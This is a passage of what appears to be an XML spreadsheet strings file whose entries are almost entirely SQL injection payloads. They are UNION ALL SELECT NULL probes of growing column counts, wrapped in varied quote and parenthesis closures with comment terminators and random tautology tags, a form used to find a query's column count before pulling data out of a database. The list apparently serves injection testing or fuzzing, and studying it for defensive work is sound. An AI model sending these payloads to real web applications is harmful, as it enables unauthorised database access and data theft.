    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "pWRI" = "pWRI</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "xjOB" = "xjOB</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "sMdz" = "sMdz</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "wMVe" = "wMVe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vRlU" = "vRlU</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Wsle" = "Wsle</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "FySY" = "FySY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "WgQt" = "WgQt</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "qNyI" = "qNyI</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "iDBL" = "iDBL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "oPpm" = "oPpm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "EXkT" = "EXkT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "xkGT" = "xkGT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ZSwK" = "ZSwK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "HIdp" = "HIdp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "fasg" = "fasg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "VSAm" = "VSAm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Guws" = "Guws</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "MbiD" LIKE "MbiD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "yWBx" LIKE "yWBx</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kxly" LIKE "kxly</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "YGBA" LIKE "YGBA</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "HKAT" LIKE "HKAT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "bNgY" LIKE "bNgY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "OvYt" LIKE "OvYt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "JDzr" LIKE "JDzr</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "lZIq" LIKE "lZIq</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "XJTu" LIKE "XJTu</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "wnIT" LIKE "wnIT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "ytxP" LIKE "ytxP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "otzG" LIKE "otzG</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "BKAX" LIKE "BKAX</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "kumb" LIKE "kumb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "tvGh" LIKE "tvGh</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "pdOH" LIKE "pdOH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "EmRd" LIKE "EmRd</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "hzCk" LIKE "hzCk</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "dArM" LIKE "dArM</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "jBBP" LIKE "jBBP</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "cAJH" LIKE "cAJH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "pIEP" LIKE "pIEP</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "lvuY" LIKE "lvuY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "MDex" LIKE "MDex</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "bILh" LIKE "bILh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "NoZv" LIKE "NoZv</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "wIEA" LIKE "wIEA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "oTvs" LIKE "oTvs</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "BpTN" LIKE "BpTN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "AbQA" LIKE "AbQA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "vItm" LIKE "vItm</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ZkDE" LIKE "ZkDE</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "JzoY" LIKE "JzoY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "PfaK" LIKE "PfaK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "dnsb" LIKE "dnsb</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "vJYU" LIKE "vJYU</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "PnFt" LIKE "PnFt</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "juRN" LIKE "juRN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Vbag" LIKE "Vbag</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>'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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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AND  ( 9225 = 9225</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3799 = 3799</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 9129 = 9129</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 9489 = 9489</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3306 = 3306</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 1863 = 1863</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6642 = 6642</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 5745 = 5745</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 4073 = 4073</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8195 = 8195</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3304 = 3304</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  8450 = 8450</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT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</si>
  <si>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AND   (  (  4529 = 4529</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  2043 = 2043</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  210 = 210</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1504 = 1504</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3848 = 3848</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  6395 = 6395</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2367 = 2367</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 1766 = 1766</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2267 = 2267</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5903 = 5903</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8507 = 8507</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 1726 = 1726</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4052 = 4052</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 844 = 844</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 306 = 306</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 1379 = 1379</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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AND  ( 'kqcf' = 'kqcf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'dQqU' = 'dQqU</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'msqe' = 'msqe</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'QwGn' = 'QwGn</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'EdUp' = 'EdUp</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'AYXG' = 'AYXG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'aQCQ' = 'aQCQ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'oRau' = 'oRau</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'LxCI' = 'LxCI</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'SRRf' = 'SRRf</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'HjYb' = 'HjYb</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'lPWl' = 'lPWl</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'GaXA' = 'GaXA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'eWsF' = 'eWsF</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'LnGZ' = 'LnGZ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'QBcT' = 'QBcT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'XYLl' = 'XYLl</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'SCyo' = 'SCyo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'uiiA' = 'uiiA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'isQM' = 'isQM</t>
  </si>
  <si>
